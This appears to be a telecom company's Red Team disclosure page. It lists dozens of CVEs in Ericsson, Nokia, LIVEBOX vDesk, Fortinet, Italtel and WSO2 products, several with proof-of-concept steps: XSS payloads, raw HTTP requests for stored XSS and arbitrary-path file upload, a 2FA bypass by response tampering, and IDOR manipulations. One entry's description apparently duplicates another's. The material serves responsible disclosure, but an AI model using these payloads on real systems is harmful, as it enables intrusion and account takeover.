Nell’ambito delle attività di Cybersecurity di TIM, è stato costituito un gruppo di lavoro dedicato all’esecuzione di Security Assessment (Red Team), che si occupa di analizzare software sviluppato on-demand, software di mercato e firmware.
Tra gli obiettivi del team c’è quello di rilevare le vulnerabilità che un potenziale attaccante potrebbe sfruttare per eseguire degli attacchi informatici verso le infrastrutture di TIM ed evidenziarne gli impatti reali rilevati.
L’attività non si limita alla sola verifica delle vulnerabilità note, ma include un’attività di ricerca specifica con l’obiettivo di scoprire eventuali nuove vulnerabilità non ancora conosciute pubblicamente (vulnerabilità 0day).
Qualora vengano rilevate vulnerabilità 0day, si procede con una “divulgazione responsabile” verso il produttore del prodotto analizzato, comunicandogli prontamente e in via confidenziale le vulnerabilità scoperte, in modo che possa replicarle e produrre una contromisura (patch) entro 90 giorni dalla notifica ricevuta.
In seguito al rilascio della contromisura (patch), oppure trascorsi i 90 giorni dalla segnalazione, si procede alla pubblicazione, classificando le vulnerabilità sul Mitre (CVE, Common Vulnerabilities and Exposures).
Analoghe azioni vengono intraprese nell’ambito dei processi di Security Testing e Gestione Incidenti (Incident Handling) di TIM, qualora portino a scoprire vulnerabilità non ancora note al produttore e alla comunità.
Vulnerability Description: Improper Access Control – CWE-284
Software Version: 23.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-39909
CVSv3:
Severity:
Credits: Massimiliano Ferraresi, Luca Borzacchiello, Andrea Carlo Maria Dattola, Massimiliano Brolli
Ericsson Network Manager (ENM), versions prior to 23.2, contains a vulnerability where Improper Access Control can lead to unauthenticated users with low privilege to access the NCM application.
Vulnerability Description: Plaintext Storage of a Password ('Improper Password Storage') – CWE-256
Software Version: 17.1.20190111
NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-38328
CVSv3: 4.9
Severity: Medium
Credits: Luca Di Giuseppe, Antonio Papa, Stefano Scipioni, Fabio Minarelli, Massimiliano Brolli
An issue was discovered in eGroupWare 17.1.20190111. An Improper Password Storage vulnerability affects the setup panel of under setup/manageheader.php, which allows authenticated remote attackers with administrator credentials to read a cleartext database password.
Step-by-step instructions and PoC
An authenticated admin user can read database credentials stored in cleartext in the eGroupWare setup panel.
Affected Endpoints
URL:
https://hostname/[REDACTED]/egroupware/setup/manageheader.php
https://hostname/[REDACTED]/egroupware/calendar/freebusy.php
Below are the evidences with the vulnerability details and the payload used.
Figure 7: Database credentials stored in cleartext in the eGroupWare setup panel
Security Impact
By By exploiting this vulnerability, it is possible to access the web application’s data stored into the database.
Vulnerability Description: Observable Response Discrepancy - CWE-204
Software Version: 10.12.4 6.0.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-26071
CVSv3: 7,5
Severity: High
Credits: Marco Ventura, Massimiliano Brolli
An issue was discovered in MCUBO ICT through v.10.12.4 – 6.0.2. An Observable Response Discrepancy can occur under the login web page. In particular, the web application provides different responses to incoming requests in a way that reveals internal state information to an unauthorized actor. That allow an unauthorized actor to perform User Enumeration attacks.
Vulnerability Description: Improper Access Control - CWE-284
Software Version: 21B
NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-26062
CVSv3: 7.0
Severity: High
Credits: Massimiliano Ferraresi, Luca Borzacchiello, Massimiliano Brolli
A mobile network solution internal fault is found in Nokia Web Element Manager 21B. Exploit of this vulnerability is not possible from outside of mobile network solution architecture. This means that exploit is not possible from mobile network user UEs, from roaming networks, or from Internet. Exploit is possible only from CSP (Communication Service Provider) mobile network solution internal BTS management network.
Due to this vulnerability, the Nokia Web Element Manager allows an unprivileged user (must be logged in) to execute administrative function.
Step-by-step instructions and PoC
First Step create two users:
· Nemuadmin (admin)
· tespt (readonly)
The following evidence shows the read-only functionalities for testpt user:
Figure 1 read-only user
With an http proxy is possible to intercept the response from login request by tespt and we
change the fields in the response from “profile”:”BTSRead” to “profile”:”Nemuadmin” and
“readOnlyAccess”: true to “readOnlyAccess”: false
Figure 2 request/response by testpt user (read only)
And the user testpt will have an access to administrative functions:
Like PoC with testpt (read-only user) we dump the S1 traffic from the BBU:
Figure 4 Dump traffic with testpt (read-only)
Security Impact
By exploiting the this vulnerability an attacker can access admin’s functionality with a unprivileged user.
Vulnerability Description: Improper Privilege Management - CWE-269
Software Version: 3.18
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-47531
CVSv3:
Severity:
Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli
EPG / vEPG (3.x versions prior to 3.25 and 2.x versions prior to 2.16) contains a vulnerability where Missing Input Validation can lead to authenticated users to bypass system CLI and execute commands they are authorized to execute directly in the UNIX shell. This vulnerability if exploited can lead to limited loss of confidentiality and/or low impact to integrity and availability of the system.
Vulnerability Description: Improper Neutralization of Formula Elements in a CSV File– CWE-1236
Software Version: < 22.1
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-46408
CVSv3: 6,8
Severity: Medium
Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli
Ericsson Network Manager (ENM), versions prior to 22.1, contains a vulnerability in the application Network Connectivity Manager (NCM) where improper Neutralization of Formula Elements in a CSV File can lead to remote code execution or data leakage via maliciously injected hyperlinks. The attacker would need admin/elevated access to exploit the vulnerability.
Vulnerability Description: Open Redirect – CWE-601
Software Version: < 22.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-46407
CVSv3: 4,8
Severity: Medium
Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli
Ericsson Network Manager (ENM), versions prior to 22.2, contains a vulnerability in the REST endpoint “editprofile” where Open Redirect HTTP Header Injection can lead to redirection of the submitted request to domain out of control of ENM deployment. The attacker would need admin/elevated access to exploit the vulnerability
Vulnerability Description: Improper Access Control (Export of Users)- CWE-284
Software Version: <= v.018
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45180
CVSv3: 6,5
Severity: Medium
Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli
An issue was discovered in LIVEBOX Collaboration vDesk through v018.Broken Access Control exists under the /api/v1/vdesk_{DOMAIN]/export endpoint.A malicious user, authenticated to the product without any specific privilege, can use the API for exporting information about all users of the system (an operation intended to only be available to the system administrator).
Step-by-step instructions and PoC
A malicious user, authenticated to Collaboration vDesk without any specific privilege, can
use the API for exporting the information about all the users of the system.
Affected Endpoints
· https://vdeskbridge.[HOSTNAME]/api/v1/vdesk_[DOMAIN] /export
Payload used by an attacker to create arbitrary guest users without authentication:
Figure 4 Detail of the request and response. In the response we can see (highlighted in yellow) the information of the users encoded in base64.
Security Impact
This vulnerability would allow an attacker, authenticated as guest, to export the data of all
the users registered in the system.
Vulnerability Description: Improper Access Control- CWE-284
Software Version: <= v.018
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45178
CVSv3: 8,8
Severity: High
Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli
An issue was discovered in LIVEBOX Collaboration vDesk through v018. Broken Access Control exists under the /api/v1/vdeskintegration/saml/user/createorupdate endpoint, the /settings/guest-settings endpoint, the /settings/samlusers-settings endpoint, and the /settings/users-settings endpoint. A malicious user (already logged in as a SAML User) is able to achieve privilege escalation from a low-privilege user (FGM user) to an administrative user (GGU user), including the administrator, or create new users even without an admin role.
Step-by-step instructions and PoC
A malicious user already logged as SAML User is able to perform privilege Escalation from
FGM to GGU user, including the administrator, or create new users even with admin roles.
Affected Endpoints
· https://vdeskbridge.[REDACTED]/api/v1/vdeskintegration/saml/user/createorupdate
· https://vdesk.[REDACTED]/settings/guest-settings
· https://vdesk.[REDACTED]/settings/samlusers-settings
· https://vdesk.[REDACTED]/settings/users-settings
Below are the evidences with the vulnerability details and the payloads used:
Figure 5 Pair of HTTP requests and responses showing the role change from FGM to GGU
Security Impact
A user authenticated with SAML is able to change his privileges by making his profile with
high privileges, even admin privileges in the system, causing privilege escalation.
Vulnerability Description: Insecure Direct Object Reference (Cached Files) – CWE-639
Software Version: <= v.018
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45175
CVSv3: 6,5
Severity: Medium
Credits: Luca Borzacchiello, Massimiliano Brolli
An issue was discovered in LIVEBOX Collaboration vDesk through v018. An Insecure Direct Object Reference can occur under the 5.6.5-3/doc/{ID-FILE]/c/{N]/{C]/websocket endpoint. A malicious unauthenticated user can access cached files in the OnlyOffice backend of other users by guessing the file ID of a target file.
Step-by-step instructions and PoC
A malicious user can fool vShare (through a WebSocket) to return a link to the OnlyOffice
cache of text files, even of other users.
The vulnerability can be exploited in the following way:
1. the attacker opens a text file in his vShare, this will open a websocket towards vdeskoffice;
2. the attacker looks at the history of websocket requests, and finds the one that asks for the cached file;
the attacker modifies the ID of its own file with the target one. The target ID could be obtained: (a) performing a brute-force attack (32-bit of entropy), (b) looking at the browser 1. history of the victim, and looking for a link with the following shape: [...]/5.6.5-3/doc/[ID]/... where [ID] is the target file ID.
Payload used to exploit the vulnerability:
Figure 1 Websocket payload with a spoofed "docid" (in yellow). The destination websocket is opened by the attacker and has the following shape: vdeskoffice.[HOST]/5.6.5-3/doc/[ID-FILE]/c/[N]/[C]/websocket. Notice that [ID-FILE] is the ID of the file of the attacker, and its different from the one inserted in the body of the websocket.
Figure 2 Websocket request and response. In the response (bottom right of the image) we can see the link to a file “Editor.bin”. The file is the target document in DOCY format, that can be downloaded by the attacker.The file contains the content of the target document encoded in UTF-16LE format. If the target file was a“.txt” file, we would have seen here a link to the file directly.
Security Impact
Malicious users can access files in cache of other users if they guess the target OnlyOffice’s file ID.
Vulnerability Description: Improper Authentication (Bypass Two-Factor Authentication for SAML Users - Bad Backup Code Check)- CWE-287
Software Version: <= v.018
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45174
CVSv3: 9,8
Severity: Critical
Credits: Antonella Marino, Massimiliano Brolli
An issue was discovered in LIVEBOX Collaboration vDesk through v018. A Bypass of Two-Factor Authentication for SAML Users can occur under the /login/backup_code endpoint and the /api/v1/vdeskintegration/challenge endpoint. The correctness of the TOTP is not checked properly, and can be bypassed by passing any string as the backup code.
Step-by-step instructions and PoC
The application allows a user to set a “Backup Code” to be used during the two-factor
authentication (instead of using the TOTP).
Unfortunately, for SAML users, the correctness of the TOTP is not checked correctly, and
can be bypassed passing any string as backup code.
The vulnerability can be exploited directly from the web-ui by:
1. logging into the vDesk web application as SAML user;
2. selecting the “backup code” option;
3. inserting any string in the form.
Affected Endpoints
· https://vdeskbridge.[HOSTNAME]/login/backup_code
· https://vdeskbridge.[HOSTNAME]/api/v1/vdeskintegration/
challenge
Below are the evidences with the vulnerability details and the payloads used.
Payload used to exploit the vulnerability:
Figure 7 Detail of the request and response. Notice how even if the server response fails, the
Security Impact
By exploiting the lack of validation of the backup code on SAML users, the two-factor
authentication can by bypassed by an attacker
Vulnerability Description: Improper Authentication (Bypass Two-Factor Authentication - Lack of Server-Side Validation) - CWE-287
Software Version: <= v.018
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45173
CVSv3: 9,8
Severity: Critical
Credits: Massimiliano Ferraresi, Massimiliano Brolli
An issue was discovered in LIVEBOX Collaboration vDesk through v018. A Bypass of Two-Factor Authentication can occur under the /api/v1/vdeskintegration/challenge endpoint. Because only the client-side verifies whether a check was successful, an attacker can modify the response, and fool the application into concluding that the TOTP was correct.
Step-by-step instructions and PoC
The web application implements two-factor authentication through a TOTP code. To check
whether the inserted TOTP is correct, the web-application implements the API
/api/v1/vdeskintegration/challenge. Unfortunately, only the client-side verifies
whether the check was successful, allowing an attacker to modify the response, and fool the
application that the TOTP was correct.
Affected Endpoints
· https://[...]/api/v1/vdeskintegration/challenge
Below are the evidences with the vulnerability details and the payloads used
The application responds with the following JSON, notifying that the check was not
successful:
{"status":"403","message":"OTP Check failed","totp":true}
The attacker, though, can modify the response, fooling the client-side code that the check
was correct:
{"status":200,"message":"OK","totp":true}
Vulnerability Description: Multiple Improper Access Control- CWE-284
Software Version: < v.018
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45172
CVSv3: 9,8
Severity: Critical
Credits: Andrea Carlo Maria Dattola, Massimiliano Brolli
An issue was discovered in LIVEBOX Collaboration vDesk before v018. Multiple Broken Access Control can occur under the /api/v1/registration/validateEmail endpoint, the /api/v1/vdeskintegration/user/adduser endpoint, and the /api/v1/registration/changePasswordUser endpoint. The web application is affected by flaws in authorization logic, through which a malicious user (with no privileges) is able to perform privilege escalation to the administrator role, and steal the accounts of any users on the system.
Step-by-step instructions and PoC
A malicious user without authentication is able to steal the accounts of other users, including the administrator, or create new users even with admin roles.
Affected Endpoints
· https://vdeskbridge.[REDACTED]/api/v1/registration/validateEmail?
· https://vdeskbridge.[REDACTED]/api/v1/vdeskintegration/user/adduser
· https://vdeskbridge.[REDACTED]/api/v1/registration/changePasswordUser
Payload used by an attacker to create arbitrary guest users without authentication:
Figure 1 HTTP Request and Response pair in which the creation of new users without authentication
Figure 2 Pair of HTTP requests and responses showing the theft of a victim user's account without authentication.
Security Impact
A malicious user without authentication is able to steal the accounts of other users, including the administrator, or create new users even with admin roles.
Vulnerability Description: Cryptographic Issue (File Encryption API) - CWE-310
Software Version: <= v.018
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-45170
CVSv3: 6,5
Severity: Medium
Credits: Luca Borzacchiello, Massimiliano Brolli
An issue was discovered in LIVEBOX Collaboration vDesk before v018. Multiple Broken Access Control can occur under the /api/v1/registration/validateEmail endpoint, the /api/v1/vdeskintegration/user/adduser endpoint, and the /api/v1/registration/changePasswordUser endpoint. The web application is affected by flaws in authorization logic, through which a malicious user (with no privileges) is able to perform privilege escalation to the administrator role, and steal the accounts of any users on the system.
Step-by-step instructions and PoC
The application allows a malicious user to decipher a file without knowing the key set by
the user.
The vulnerability can be exploited in the following way:
1. the attacker logs in the victim account (we assume that the attacker knows the credentials of the victim, or has access to the victim logged account);
2. the attacker list the ID of the files in the vShare of the victim performing a GET
request to https://vdeskbridge.[HOSTNAME]/api/v1/files?path= ;
3. the attacker performs a POST request to https://vdeskbridge.[HOSTNAME]
/api/v1/vencrypt/decrypt/file specifying the ID of the cyphered file that
he wants to decipher (obtained at 2).
Notice that the same attack is successful if the attacker downloads the cyphered file, upload
it to its own VDESK account, and performs the same POST request at line 3.
Affected Endpoints
· https://vdeskbridge.[HOSTNAME]/api/v1/vencrypt/
decrypt/file
Below are the evidences with the vulnerability details and the payloads used.
Paylod used to exploit the vulnerability:
Figure 6 Notice how in the request we are not specifying any password or derived secret.
Security Impact
A malicious user can decrypt the file of the victim without knowing the cyphering key.
Vulnerability Description: Improper Neutralization of Directives in Dynamically Evaluated Code – CWE-95
Software Version: v9.7.05
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-41763
CVSv3: 8.8
Severity: High
Credits: Claudio Jacomelli, Sebastiano Lanzarotto, Massimiliano Brolli
An issue was discovered in NOKIA AMS 9.7.05. Remote Code Execution exists via the debugger of the ipAddress variable. A remote user, authenticated to the AMS server, could inject code in the PING function. The privileges of the command executed depend on the user that runs the service.
Step-by-step instructions and PoC
A remote user, authenticated to the AMS server, could inject code in the PING function
Affected Endpoints
· Server: AMS
· Function: PING Test
Below are the evidences with the vulnerability details and the payloads used.
The step to achieve the vulnerability consist in a simple modification via debugger of the ipAddress variable. This is needed because the frontend application manage to sanitize the content.
Security Impact
The vulnerability lead to execute code on the server machine in which the user is logged in. The privilege of the command executed depends on the user that run the service.
Vulnerability Description: Absolute Path Traversal - CWE-36
Software Version: R14.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-40715
CVSv3: 6.5
Severity: Medium
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
An issue was discovered in NOKIA 1350OMS R14.2. An Absolute Path Traversal vulnerability exists for a specific endpoint via the logfile parameter, allowing a remote authenticated attacker to read files on the filesystem arbitrarily.
Vulnerability Description: Multiple Reflected Cross Site Scripting - CWE-79
Software Version: R14.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-40714
CVSv3: 6.1
Severity: Medium
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
An issue was discovered in NOKIA 1350OMS R14.2. Reflected XSS exists under different /oms1350/* endpoints.
Vulnerability Description: Multiple Relative Path Traversal - CWE-23
Software Version: R14.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-40713
CVSv3: 6.5
Severity: Medium
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
An issue was discovered in NOKIA 1350OMS R14.2. Multiple Relative Path Traversal issues exist in different specific endpoints via the file parameter, allowing a remote authenticated attacker to read files on the filesystem arbitrarily.
Vulnerability Description: Multiple Reflected Cross Site Scripting - CWE-79
Software Version: R14.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-40712
CVSv3: 6.1
Severity: Medium
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
An issue was discovered in NOKIA 1350OMS R14.2. Reflected XSS exists under different /cgi-bin/R14.2* endpoints.
Vulnerability Description: Stored Cross-Site Scripting - CWE-79
Software Version: FortiOS 6.0.7 - 6.0.15, 6.2.2 - 6.2.12, 6.4.0 - 6.4.9 and 7.0.0 - 7.0.3
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-40680
CVSv3: 5.4
Severity: Medium
Credits: Massimiliano Ferraresi, Massimiliano Brolli
A improper neutralization of input during web page generation ('cross-site scripting') in Fortinet FortiOS 6.0.7 - 6.0.15, 6.2.2 - 6.2.12, 6.4.0 - 6.4.9 and 7.0.0 - 7.0.3 allows a privileged attacker to execute unauthorized code or commands via storing malicious payloads in replacement messages.
Step-by-step instructions and PoC
Vulnerability can be reproduce through the following actions.
An attacker with system permission can inject arbitrary javascript code in the Replacement Messages pages.
An attacker have to open and modify a page like “FortiGuard Block Page”:
In the HTML source I tried to inject arbitrary javascript code, but with simple payload <script>alert(1);</script> the application did not execute anything:
Probably the application satinizes the <script></script> content and does not execute the javascript code inside these tags, however with a custom payload like <image/src/onerror=prompt("XSS")> is possible to execute arbitrary javascript code:
· <image/src/onerror=prompt("XSS")>
Click on “ok” and save the setting, the malicious code now is stored in the FortiGuardBlockPage, if the user visit this page the arbitrary javascript code will execute:
Security Impact
A potential attacker could modify the vulnerable web page with malicious javascript code permanently, thereby attacking anyone who visits the page.
Vulnerability Description: Insertion of Sensitive Information into Log File - CWE-532
Software Version: R14.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39821
CVSv3: 7.5
Severity: High
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
In NOKIA 1350 OMS R14.2, an Insertion of Sensitive Information into an Application Log File vulnerability occurs. The web application stores critical information, such as cleartext user credentials, in world-readable files in the filesystem.
Vulnerability Description: OS Command Injection - CWE-78
Software Version: R14.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39819
CVSv3: 8.8
Severity: High
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
In NOKIA 1350 OMS R14.2, multiple OS Command Injection vulnerabilities occurs. This allows authenticated users to execute commands on the operating system.
Vulnerability Description: SQL Injection - CWE-89
Software Version: R14.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39817
CVSv3: 8.8
Severity: High
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
In NOKIA 1350 OMS R14.2, multiple SQL Injection vulnerabilities occurs. Exploitation requires an authenticated attacker. Through the injection of arbitrary SQL statements, a potential authenticated attacker can modify query syntax and perform unauthorized (and unexpected) operations against the remote database.
Vulnerability Description: Insufficiently Protected Credentials - CWE-522
Software Version: R14.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39816
CVSv3: 6.5
Severity: Medium
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
In NOKIA 1350 OMS R14.2, Insufficiently Protected Credentials (cleartext administrator password) occur in the edit configuration page. Exploitation requires an authenticated attacker.
Vulnerability Description: OS Command Injection - CWE-78
Software Version: R14.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39815
CVSv3: 9.8
Severity: Critical
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
In NOKIA 1350 OMS R14.2, multiple OS Command Injection vulnerabilities occurs. This vulnerability allow unauthenticated users to execute commands on the operating system.
Vulnerability Description: Open Redirect - CWE-601
Software Version: R14.2
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39814
CVSv3: 6.1
Severity: Medium
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
In NOKIA 1350 OMS R14.2, an Open Redirect vulnerability occurs is the login page via next HTTP GET parameter.
Vulnerability Description: Multiple Cross Site Scripting Reflected/Stored- CWE-79
Software Version: 5.2.0-20211008
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39813
CVSv3: 6,1
Severity: Medium
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
Italtel NetMatch-S CI 5.2.0-20211008 allows Multiple Reflected/Stored XSS issues under NMSCIWebGui/j_security_check via the j_username parameter, or NMSCIWebGui/actloglineview.jsp via the name or actLine parameter. An attacker leveraging this vulnerability could inject arbitrary JavaScript. The payload would then be triggered every time an authenticated user browses the page containing it.
Step-by-step instructions and PoC.
The Web application does not properly check the parameters sent as input from clients before they are re-included within the HTTP pages returned by the application. In particular, the web gui is affected by both the stored and reflected type of this vulnerability. Due to the lack of validation of user input, it allows an attacker to modify the HTML code and the expected execution flow could be altered. The attack can be performed both pre and post authentication.
Affected Endpoints
· URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/j_security_chec
o HTTP POST Parameter: j_username
· URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp
o HTTP POST Parameter: name, actLine
Below are the evidences with the vulnerability details and the payloads used.
URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/j_security_chec
Payload used to exploit the vulnerability:
POST /[NODE-NAME]/NMSCI-WebGui/j_security_check HTTP/1.1
Host: [HOST]
Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: https://[HOST]
Referer: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actlogview.jsp?name=test.csv;%3Cimg+src
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
j_username=<img+src=x+onerror=alert(document.cookie)+>&j_password=%27
The endpoint is affected by the Stored type of this vulnerability. The first step consists of replacing the value in the “j_username” POST parameter with the javascript code. This value is stored in the application logs and an alert is generated (Authentication failure), which can be displayed by authenticated users. Since this kind of alerts generate a notification on the home page, the javascript code is executed as soon as a user logs into the web GUI. This vulnerability is particularly critical, since the attacker does not need any kind of access to the web application in order to exploit it.
URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp
Payload used to exploit the vulnerability:
POST /[NODE-NAME]/NMSCI-WebGui/actloglineview.jsp HTTP/1.1
Host: [HOST] Cookie: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q= 0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 608
Origin: https://[HOST]
Referer: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/actlogview.jsp?name=today.csv
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
name=today.csv&actLine=”</script><img src=x onerror=”alert(1)”>
The endpoint is affected by the Reflected type of this vulnerability. The first step consists of replacing the value in the “actLine” POST parameter with the javascript code to modify the content of the HTML response page, the content of the parameter is printed without any checks being made. The same behavior is present also for the name parameter. This endpoint is exploitable by any authenticated user that is able to view the application logs.
Security Impact
Successful attacks of this vulnerability can result in unauthorized access to critical data or complete account takeover.
Vulnerability Description: Absolute Path Traversal- CWE-36
Software Version: 5.2.0-20211008
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39812
CVSv3: 7,5
Severity: High
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
Italtel NetMatch-S CI 5.2.0-20211008 allows Absolute Path Traversal under NMSCI-WebGui/SaveFileUploader. An unauthenticated user can upload files to an arbitrary path. An attacker can change the uploadDir parameter in a POST request (not possible using the GUI) to an arbitrary directory. Because the application does not check in which directory a file will be uploaded, an attacker can perform a variety of attacks that can result in unauthorized access to the server.
Step-by-step instructions and PoC
An unauthenticated user can upload files in an arbitrary path using a specific functionality of the web application. An attacker can change the “uploadDir” parameter in the POST request (not possible using the GUI) to an arbitrary directory. Since the application does not check in which directory the file will be uploaded, an attacker can perform a variety of attacks that can result in unauthorized access to the server.
Below are the evidences with the vulnerability details and the payloads used. In this case, uploadDir was changed from /var/tmp/external/ to /home/oam/
Payload used to exploit the vulnerability:
POST /[NODE-NAME]/NMSCI-WebGui/SaveFileUploader HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=--------------------------- 102436911942005582423300325296
Content-Length: 484
Origin: https://[HOST]
Referer: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/system.jsp
Te: trailers
Connection: close
-----------------------------102436911942005582423300325296
Content-Disposition: form-data; name="file"; filename="TEST.sh"
Content-Type: application/x-shellscript
TEST
-----------------------------102436911942005582423300325296
Content-Disposition: form-data; name="fileName"
TEST.sh
-----------------------------102436911942005582423300325296
Content-Disposition: form-data; name="uploadDir"
/home/oam/
-----------------------------102436911942005582423300325296—
Security Impact
By exploiting this vulnerability on the web portal it was possible to upload files in an arbitrary path on the filesystem.
Vulnerability Description: Multiple Improper Access Control- CWE-284
Software Version: 5.2.0-20211008
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39811
CVSv3: 9,1
Severity: Critical
Credits: Luca Carbone, Fabio Romano, Stefano Scipioni, Massimiliano Brolli
Italtel NetMatch-S CI 5.2.0-20211008 has incorrect Access Control under NMSCI-WebGui/advancedsettings.jsp and NMSCIWebGui/SaveFileUploader. By not verifying permissions for access to resources, it allows an attacker to view pages that are not allowed, and modify the system configuration, bypassing all controls (without checking for user identity).
Step-by-step instructions and PoC
Any user logged in the web application can view pages or use functionalities that are normally accessible only by specific roles. In some cases, these functionalities can be accessed even without authentication. This vulnerability can be exploited in order to gather critical information or in order to have unauthorized access to some functionalities.
Affected Endpoints
· URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/advanced-settings.jsp
· URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/SaveFileUploader
Below are the evidences with the vulnerability details and the payloads used
URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/advanced-settings.jsp
As an example, a user with the “Administrator” role can access the advanced settings page, which is normally available only to “System Administrator” users. This vulnerability can by exploited by simply inserting the appropriate endpoint in the URL.
URL: https://[HOST]/[NODE-NAME]/NMSCI-WebGui/SaveFileUploader
We can access the “Upload file” functionality in order to upload arbitrary files on the filesystem without authentication.
Security Impact
By exploiting this vulnerability on the web application it was possible to have unauthorized access to critical information and functionalities.
Vulnerability Description: Cross-Site Scripting - CWE-79
Software Version: 6.4.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39810
CVSv3: 6.1
Severity: Medium
Credits: Tiziano Di Vincenzo, Massimiliano Brolli
An issue was discovered in WSO2 Enterprise Integrator 6.4.0. A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the Management Console under /carbon/ndatasource/validateconnection/ajaxprocessor.jsp via the “driver” parameter. Session hijacking or similar attacks would not be possible.
Vulnerability Description: Cross-Site Scripting - CWE-79
Software Version: 6.4.0
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-39809
CVSv3: 6.1
Severity: Medium
Credits: Tiziano Di Vincenzo, Massimiliano Brolli
An issue was discovered in WSO2 Enterprise Integrator 6.4.0. A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the Management Console under /carbon/mediation_secure_vault/properties/ajaxprocessor.jsp via the “name” parameter. Session hijacking or similar attacks would not be possible.
Vulnerability Description: Cross-Site Request Forgery (CWE-352)
Software Version: v22.0.0.62
NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-30280
CVSv3: 8.8
Severity: High
Credits: Massimiliano Ferraresi, Massimiliano Brolli
/SecurityManagement/html/createuser.jsf in Nokia NetAct 22 allows CSRF. A remote attacker is able to create users with arbitrary privileges, even administrative privileges. The application (even if it implements a CSRF token for the random GET request) does not ever verify a CSRF token. With a little help of social engineering/phishing (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
Step-by-step instructions and PoC
It’s worth to remark that from the admin profile it is possible to add users with various privileges by exploiting this endpoint:
· https://hostname/SecurityManagement/html/listusers.jsf
The following image shows the application without testCSRF profile:
The administrator, who is logged into the application, is induced to visit, by means of phishing or social engineering, an endpoint containing a specific HTML code csrf2.html
Then, the administrator's browser will sends the following HTTP requests to the NetAct application that accept the request with arbitrary Origin and Referer.
If a logged system administrator visits the endpoint with malicious javascript code crafted by an attacker, the new user testCSRF will appear in the application with admin privileges.
Security Impact
By exploiting this issue, a remote attacker is able to add arbitrary user on Nokia NetAct on behalf of a regular platform administrator.
